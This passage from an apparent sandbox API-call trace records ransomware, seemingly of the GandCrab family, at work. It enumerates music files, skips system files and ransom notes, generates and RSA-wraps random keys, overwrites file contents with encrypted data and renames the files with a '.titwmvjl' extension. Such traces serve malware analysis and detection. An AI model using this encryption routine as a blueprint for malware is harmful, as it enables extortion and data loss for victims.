flProtect=0x4) returned 0x2410000 [0093.412] wsprintfW (in: param_1=0x2410000, param_2="%ws " | out: param_1=".lock ") returned 6 [0093.412] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0093.412] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0093.412] FindNextFileW (in: hFindFile=0x5032f8, lpFindFileData=0x259f290 | out: lpFindFileData=0x259f290) returned 1 [0093.412] lstrcmpW (lpString1="Dg d.wav", lpString2=".") returned 1 [0093.412] lstrcmpW (lpString1="Dg d.wav", lpString2="..") returned 1 [0093.412] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Music\\VpI4NfJ\\", lpString2="Dg d.wav" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Music\\VpI4NfJ\\Dg d.wav") returned="C:\\Users\\CIiHmnxMn6Ps\\Music\\VpI4NfJ\\Dg d.wav" [0093.412] lstrlenW (lpString=".titwmvjl") returned 9 [0093.412] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Music\\VpI4NfJ\\Dg d.wav") returned 44 [0093.412] VirtualAlloc (lpAddress=0x0, dwSize=0x98, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0093.412] wsprintfW (in: param_1=0x1e70000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Music\\VpI4NfJ\\Dg d.wav.titwmvjl") returned 53 [0093.412] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Music\\VpI4NfJ\\Dg d.wav") returned 44 [0093.412] lstrlenW (lpString=".wav") returned 4 [0093.412] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0093.412] wsprintfW (in: param_1=0x2410000, param_2="%ws " | out: param_1=".wav ") returned 5 [0093.413] lstrcmpiW (lpString1=".wav", lpString2=".titwmvjl") returned 1 [0093.413] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0093.413] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Music\\VpI4NfJ\\Dg d.wav") returned 44 [0093.413] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Music\\VpI4NfJ\\Dg d.wav") returned 44 [0093.413] lstrcmpiW (lpString1="Dg d.wav", lpString2="desktop.ini") returned 1 [0093.413] lstrcmpiW (lpString1="Dg d.wav", lpString2="autorun.inf") returned 1 [0093.413] lstrcmpiW (lpString1="Dg d.wav", lpString2="ntuser.dat") returned -1 [0093.413] lstrcmpiW (lpString1="Dg d.wav", lpString2="iconcache.db") returned -1 [0093.413] lstrcmpiW (lpString1="Dg d.wav", lpString2="bootsect.bak") returned 1 [0093.413] lstrcmpiW (lpString1="Dg d.wav", lpString2="boot.ini") returned 1 [0093.413] lstrcmpiW (lpString1="Dg d.wav", lpString2="ntuser.dat.log") returned -1 [0093.413] lstrcmpiW (lpString1="Dg d.wav", lpString2="thumbs.db") returned -1 [0093.413] lstrcmpiW (lpString1="Dg d.wav", lpString2="TITWMVJL-DECRYPT.txt") returned -1 [0093.413] lstrcmpiW (lpString1="Dg d.wav", lpString2="TITWMVJL-DECRYPT.html") returned -1 [0093.413] lstrcmpiW (lpString1="Dg d.wav", lpString2="KRAB-DECRYPT.html") returned -1 [0093.413] lstrcmpiW (lpString1="Dg d.wav", lpString2="CRAB-DECRYPT.html") returned 1 [0093.413] lstrcmpiW (lpString1="Dg d.wav", lpString2="KRAB-DECRYPT.txt") returned -1 [0093.413] lstrcmpiW (lpString1="Dg d.wav", lpString2="CRAB-DECRYPT.txt") returned 1 [0093.413] lstrcmpiW (lpString1="Dg d.wav", lpString2="ntldr") returned -1 [0093.413] lstrcmpiW (lpString1="Dg d.wav", lpString2="NTDETECT.COM") returned -1 [0093.413] lstrcmpiW (lpString1="Dg d.wav", lpString2="Bootfont.bin") returned 1 [0093.413] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Music\\VpI4NfJ\\Dg d.wav") returned 44 [0093.413] lstrlenW (lpString=".wav") returned 4 [0093.413] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0093.413] wsprintfW (in: param_1=0x2410000, param_2="%s " | out: param_1=".wav ") returned 5 [0093.413] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0093.414] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0093.414] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Music\\VpI4NfJ\\Dg d.wav" (normalized: "c:\\users\\ciihmnxmn6ps\\music\\vpi4nfj\\dg d.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x2b4 [0093.414] SetFilePointerEx (in: hFile=0x2b4, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0093.414] ReadFile (in: hFile=0x2b4, lpBuffer=0x2410000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x259f1dc, lpOverlapped=0x0 | out: lpBuffer=0x2410000*, lpNumberOfBytesRead=0x259f1dc*=0x21c, lpOverlapped=0x0) returned 1 [0093.415] SetFilePointerEx (in: hFile=0x2b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0093.415] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0093.415] CryptAcquireContextW (in: phProv=0x259f10c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259f10c*=0x4c9980) returned 1 [0093.415] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x2420000 [0093.416] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0093.416] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0093.416] CryptGenRandom (in: hProv=0x4c9980, dwLen=0x20, pbBuffer=0x259f198 | out: pbBuffer=0x259f198) returned 1 [0093.416] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0093.416] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0093.416] VirtualFree (lpAddress=0x2420000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0093.416] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0093.416] CryptAcquireContextW (in: phProv=0x259f10c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259f10c*=0x4c9980) returned 1 [0093.417] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x2420000 [0093.417] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0093.417] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0093.417] CryptGenRandom (in: hProv=0x4c9980, dwLen=0x8, pbBuffer=0x259f1b8 | out: pbBuffer=0x259f1b8) returned 1 [0093.417] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0093.417] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0093.417] VirtualFree (lpAddress=0x2420000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0093.418] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0093.418] CryptAcquireContextW (in: phProv=0x259f100, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259f100*=0x4c9980) returned 1 [0093.418] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0093.419] CryptImportKey (in: hProv=0x4c9980, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259f104 | out: phKey=0x259f104*=0x5033b8) returned 1 [0093.419] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0093.419] CryptGetKeyParam (in: hKey=0x5033b8, dwParam=0x8, pbData=0x259f0f8, pdwDataLen=0x259f0fc, dwFlags=0x0 | out: pbData=0x259f0f8*=0x800, pdwDataLen=0x259f0fc*=0x4) returned 1 [0093.419] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0093.419] CryptEncrypt (in: hKey=0x5033b8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2410000*, pdwDataLen=0x259f130*=0xc8, dwBufLen=0x100 | out: pbData=0x2410000*, pdwDataLen=0x259f130*=0x100) returned 1 [0093.419] GetLastError () returned 0x0 [0093.419] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0093.419] CryptDestroyKey (hKey=0x5033b8) returned 1 [0093.419] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0093.420] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0093.420] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0093.420] CryptAcquireContextW (in: phProv=0x259f100, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259f100*=0x4c9980) returned 1 [0093.420] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0093.420] CryptImportKey (in: hProv=0x4c9980, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259f104 | out: phKey=0x259f104*=0x5036f8) returned 1 [0093.420] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0093.420] CryptGetKeyParam (in: hKey=0x5036f8, dwParam=0x8, pbData=0x259f0f8, pdwDataLen=0x259f0fc, dwFlags=0x0 | out: pbData=0x259f0f8*=0x800, pdwDataLen=0x259f0fc*=0x4) returned 1 [0093.420] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0093.420] CryptEncrypt (in: hKey=0x5036f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2410100*, pdwDataLen=0x259f130*=0xc8, dwBufLen=0x100 | out: pbData=0x2410100*, pdwDataLen=0x259f130*=0x100) returned 1 [0093.421] GetLastError () returned 0x0 [0093.421] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0093.421] CryptDestroyKey (hKey=0x5036f8) returned 1 [0093.421] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0093.421] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0093.421] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x2650000 [0093.421] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x2760000 [0093.421] ReadFile (in: hFile=0x2b4, lpBuffer=0x2650000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x259f1dc, lpOverlapped=0x0 | out: lpBuffer=0x2650000*, lpNumberOfBytesRead=0x259f1dc*=0x14893, lpOverlapped=0x0) returned 1 [0093.432] SetFilePointerEx (in: hFile=0x2b4, liDistanceToMove=0xfffeb76d, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0093.432] WriteFile (in: hFile=0x2b4, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x14893, lpNumberOfBytesWritten=0x259f1c0, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x259f1c0*=0x14893, lpOverlapped=0x0) returned 1 [0093.433] SetFilePointerEx (in: hFile=0x2b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0093.434] WriteFile (in: hFile=0x2b4, lpBuffer=0x2410000*, nNumberOfBytesToWrite=0x21c, lpNumberOfBytesWritten=0x259f1c0, lpOverlapped=0x0 | out: lpBuffer=0x2410000*, lpNumberOfBytesWritten=0x259f1c0*=0x21c, lpOverlapped=0x0) returned 1 [0093.435] VirtualFree (lpAddress=0x2650000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0093.438] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0093.439] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0093.439] CloseHandle (hObject=0x2b4) returned 1 [0093.439] MoveFileExW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\Music\\VpI4NfJ\\Dg d.wav" (normalized: "c:\\users\\ciihmnxmn6ps\\music\\vpi4nfj\\dg d.wav"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\Music\\VpI4NfJ\\Dg d.wav.titwmvjl" (normalized: "c:\\users\\ciihmnxmn6ps\\music\\vpi4nfj\\dg d.wav.titwmvjl"), dwFlags=0x1) returned 1 [0093.440] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0093.440] FindNextFileW (in: hFindFile=0x5032f8, lpFindFileData=0x259f290 | out: lpFindFileData=0x259f290) returned 1 [0093.440] lstrcmpW (lpString1="iBXXygv.mp3", lpString2=".") returned 1 [0093.440] lstrcmpW (lpString1="iBXXygv.mp3", lpString2="..") returned 1 [0093.440] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Music\\VpI4NfJ\\", lpString2="iBXXygv.mp3" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Music\\VpI4NfJ\\iBXXygv.mp3") returned="C:\\Users\\CIiHmnxMn6Ps\\Music\\VpI4NfJ\\iBXXygv.mp3" [0093.440] lstrlenW (lpString=".titwmvjl") returned 9 [0093.440] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Music\\VpI4NfJ\\iBXXygv.mp3") returned 47 [0093.440] VirtualAlloc (lpAddress=0x0, dwSize=0x9e, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0093.441] wsprintfW (in: param_1=0x1e70000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Music\\VpI4NfJ\\iBXXygv.mp3.titwmvjl") returned 56 [0093.442] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Music\\VpI4NfJ\\iBXXygv.mp3") returned 47 [0093.442] lstrlenW (lpString=".mp3") returned 4 [0093.442] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0093.442] wsprintfW (in: param_1=0x2410000, param_2="%ws " | out: param_1=".mp3 ") returned 5 [0093.442] lstrcmpiW (lpString1=".mp3", lpString2=".titwmvjl") returned -1 [0093.442] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0093.443] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Music\\VpI4NfJ\\iBXXygv.mp3") returned 47 [0093.443] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Music\\VpI4NfJ\\iBXXygv.mp3") returned 47 [0093.443] lstrcmpiW (lpString1="iBXXygv.mp3", lpString2="desktop.ini") returned 1 [0093.443] lstrcmpiW (lpString1="iBXXygv.mp3", lpString2="autorun.inf") returned 1 [0093.443] lstrcmpiW (lpString1="iBXXygv.mp3", lpString2="ntuser.dat") returned -1 [0093.443] lstrcmpiW (lpString1="iBXXygv.mp3", lpString2="iconcache.db") returned -1 [0093.443] lstrcmpiW (lpString1="iBXXygv.mp3", lpString2="bootsect.bak") returned 1 [0093.443] lstrcmpiW (lpString1="iBXXygv.mp3", lpString2="boot.ini") returned 1 [0093.443] lstrcmpiW (lpString1="iBXXygv.mp3", lpString2="ntuser.dat.log") returned -1 [0093.443] lstrcmpiW (lpString1="iBXXygv.mp3", lpString2="thumbs.db") returned -1 [0093.443] lstrcmpiW (lpString1="iBXXygv.mp3", lpString2="TITWMVJL-DECRYPT.txt") returned -1 [0093.443] lstrcmpiW (lpString1="iBXXygv.mp3", lpString2="TITWMVJL-DECRYPT.html") returned -1 [0093.443] lstrcmpiW (lpString1="iBXXygv.mp3", lpString2="KRAB-DECRYPT.html") returned -1 [0093.443] lstrcmpiW (lpString1="iBXXygv.mp3", lpString2="CRAB-DECRYPT.html") returned 1 [0093.443] lstrcmpiW (lpString1="iBXXygv.mp3", lpString2="KRAB-DECRYPT.txt") returned -1 [0093.443] lstrcmpiW (lpString1="iBXXygv.mp3", lpString2="CRAB-DECRYPT.txt") returned 1 [0093.443] lstrcmpiW (lpString1="iBXXygv.mp3", lpString2="ntldr") returned -1 [0093.443] lstrcmpiW (lpString1="iBXXygv.mp3", lpString2="NTDETECT.COM") returned -1 [0093.443] lstrcmpiW (lpString1="iBXXygv.mp3", lpString2="Bootfont.bin") returned 1 [0093.443] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Music\\VpI4NfJ\\iBXXygv.mp3") returned 47 [0093.443] lstrlenW (lpString=".mp3") returned 4 [0093.443] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0093.443] wsprintfW (in: param_1=0x2410000, param_2="%s " | out: param_1=".mp3 ") returned 5 [0093.443] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0093.443] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0093.444] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Music\\VpI4NfJ\\iBXXygv.mp3" (normalized: "c:\\users\\ciihmnxmn6ps\\music\\vpi4nfj\\ibxxygv.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x2b4 [0093.444] SetFilePointerEx (in: hFile=0x2b4, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0093.444] ReadFile (in: hFile=0x2b4, lpBuffer=0x2410000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x259f1dc, lpOverlapped=0x0 | out: lpBuffer=0x2410000*, lpNumberOfBytesRead=0x259f1dc*=0x21c, lpOverlapped=0x0) returned 1 [0093.445] SetFilePointerEx (in: hFile=0x2b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0093.445] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0093.445] CryptAcquireContextW (in: phProv=0x259f10c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259f10c*=0x4c9980) returned 1 [0093.445] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x2420000 [0093.446] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0093.446] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0093.446] CryptGenRandom (in: hProv=0x4c9980, dwLen=0x20, pbBuffer=0x259f198 | out: pbBuffer=0x259f198) returned 1 [0093.446] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0093.446] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0093.446] VirtualFree (lpAddress=0x2420000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0093.446] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0093.446] CryptAcquireContextW (in: phProv=0x259f10c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259f10c*=0x4c9980) returned 1 [0093.446] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x2420000 [0093.447] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0093.447] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0093.447] CryptGenRandom (in: hProv=0x4c9980, dwLen=0x8, pbBuffer=0x259f1b8 | out: pbBuffer=0x259f1b8) returned 1 [0093.447] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0093.447] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0093.447] VirtualFree (lpAddress=0x2420000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0093.447] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0093.447] CryptAcquireContextW (in: phProv=0x259f100, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259f100*=0x4c9980) returned 1 [0093.448] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0093.448] CryptImportKey (in: hProv=0x4c9980, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259f104 | out: phKey=0x259f104*=0x5031f8) returned 1 [0093.448] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0093.448] CryptGetKeyParam (in: hKey=0x5031f8, dwParam=0x8, pbData=0x259f0f8, pdwDataLen=0x259f0fc, dwFlags=0x0 | out: pbData=0x259f0f8*=0x800, pdwDataLen=0x259f0fc*=0x4) returned 1 [0093.448] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0093.448] CryptEncrypt (in: hKey=0x5031f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2410000*, pdwDataLen=0x259f130*=0xc8, dwBufLen=0x100 | out: pbData=0x2410000*, pdwDataLen=0x259f130*=0x100) returned 1 [0093.448] GetLastError () returned 0x0 [0093.448] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0093.449] CryptDestroyKey (hKey=0x5031f8) returned 1 [0093.449] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0093.449] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0093.449] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0093.449] CryptAcquireContextW (in: phProv=0x259f100, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259f100*=0x4c9980) returned 1 [0093.450] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0093.450] CryptImportKey (in: hProv=0x4c9980, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259f104 | out: phKey=0x259f104*=0x503838) returned 1 [0093.450] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0093.450] CryptGetKeyParam (in: hKey=0x503838, dwParam=0x8, pbData=0x259f0f8, pdwDataLen=0x259f0fc, dwFlags=0x0 | out: pbData=0x259f0f8*=0x800, pdwDataLen=0x259f0fc*=0x4) returned 1 [0093.450] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0093.450] CryptEncrypt (in: hKey=0x503838, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2410100*, pdwDataLen=0x259f130*=0xc8, dwBufLen=0x100 | out: pbData=0x2410100*, pdwDataLen=0x259f130*=0x100) returned 1 [0093.450] GetLastError () returned 0x0 [0093.450] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0093.450] CryptDestroyKey (hKey=0x503838) returned 1 [0093.451] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0093.451] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0093.451] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x2650000 [0093.451] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x2760000 [0093.451] ReadFile (in: hFile=0x2b4, lpBuffer=0x2650000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x259f1dc, lpOverlapped=0x0 | out: lpBuffer=0x2650000*, lpNumberOfBytesRead=0x259f1dc*=0x16f48, lpOverlapped=0x0) returned 1 [0093.463] SetFilePointerEx (in: hFile=0x2b4, liDistanceToMove=0xfffe90b8, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0093.463] WriteFile (in: hFile=0x2b4, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x16f48, lpNumberOfBytesWritten=0x259f1c0, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x259f1c0*=0x16f48, lpOverlapped=0x0) returned 1 [0093.464] SetFilePointerEx (in: hFile=0x2b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0093.464] WriteFile (in: hFile=0x2b4, lpBuffer=0x2410000*, nNumberOfBytesToWrite=0x21c, lpNumberOfBytesWritten=0x259f1c0, lpOverlapped=0x0 | out: lpBuffer=0x2410000*, lpNumberOfBytesWritten=0x259f1c0*=0x21c, lpOverlapped=0x0) returned 1 [0093.467] VirtualFree (lpAddress=0x2650000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0093.472] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0093.472] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0093.472] CloseHandle (hObject=0x2b4) returned 1 [0093.473] MoveFileExW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\Music\\VpI4NfJ\\iBXXygv.mp3" (normalized: "c:\\users\\ciihmnxmn6ps\\music\\vpi4nfj\\ibxxygv.mp3"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\Music\\VpI4NfJ\\iBXXygv.mp3.titwmvjl" (normalized: "c:\\users\\ciihmnxmn6ps\\music\\vpi4nfj\\ibxxygv.mp3.titwmvjl"), dwFlags=0x1) returned 1 [0093.474] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0093.474] FindNextFileW (in: hFindFile=0x5032f8, lpFindFileData=0x259f290 | out: lpFindFileData=0x259f290) returned 1 [0093.474] lstrcmpW (lpString1="qwBF.wav", lpString2=".") returned 1 [0093.474] lstrcmpW (lpString1="qwBF.wav", lpString2="..") returned 1 [0093.474] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Music\\VpI4NfJ\\", lpString2="qwBF.wav" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Music\\VpI4NfJ\\qwBF.wav") returned="C:\\Users\\CIiHmnxMn6Ps\\Music\\VpI4NfJ\\qwBF.wav" [0093.474] lstrlenW (lpString=".titwmvjl") returned 9 [0093.474] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Music\\VpI4NfJ\\qwBF.wav") returned 44 [0093.474] VirtualAlloc (lpAddress=0x0, dwSize=0x98, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0093.474] wsprintfW (in: param_1=0x1e70000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Music\\VpI4NfJ\\qwBF.wav.titwmvjl") returned 53 [0093.474] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Music\\VpI4NfJ\\qwBF.wav") returned 44 [0093.475] lstrlenW (lpString=".wav") returned 4 [0093.475] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0093.475] wsprintfW (in: param_1=0x2410000, param_2="%ws " | out: param_1=".wav ") returned 5 [0093.475] lstrcmpiW (lpString1=".wav", lpString2=".titwmvjl") returned 1 [0093.475] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0093.475] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Music\\VpI4NfJ\\qwBF.wav") returned 44 [0093.475] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Music\\VpI4NfJ\\qwBF.wav") returned 44 [0093.475] lstrcmpiW (lpString1="qwBF.wav", lpString2="desktop.ini") returned 1 [0093.475] lstrcmpiW (lpString1="qwBF.wav", lpString2="autorun.inf") returned 1 [0093.475] lstrcmpiW (lpString1="qwBF.wav", lpString2="ntuser.dat") returned 1 [0093.475] lstrcmpiW (lpString1="qwBF.wav", lpString2="iconcache.db") returned 1 [0093.475] lstrcmpiW (lpString1="qwBF.wav", lpString2="bootsect.bak") returned 1 [0093.475] lstrcmpiW (lpString1="qwBF.wav", lpString2="boot.ini") returned 1 [0093.475] lstrcmpiW (lpString1="qwBF.wav", lpString2="ntuser.dat.log") returned 1 [0093.475] lstrcmpiW (lpString1="qwBF.wav", lpString2="thumbs.db") returned -1 [0093.475] lstrcmpiW (lpString1="qwBF.wav", lpString2="TITWMVJL-DECRYPT.txt") returned -1 [0093.475] lstrcmpiW (lpString1="qwBF.wav", lpString2="TITWMVJL-DECRYPT.html") returned -1 [0093.475] lstrcmpiW (lpString1="qwBF.wav", lpString2="KRAB-DECRYPT.html") returned 1 [0093.475] lstrcmpiW (lpString1="qwBF.wav", lpString2="CRAB-DECRYPT.html") returned 1 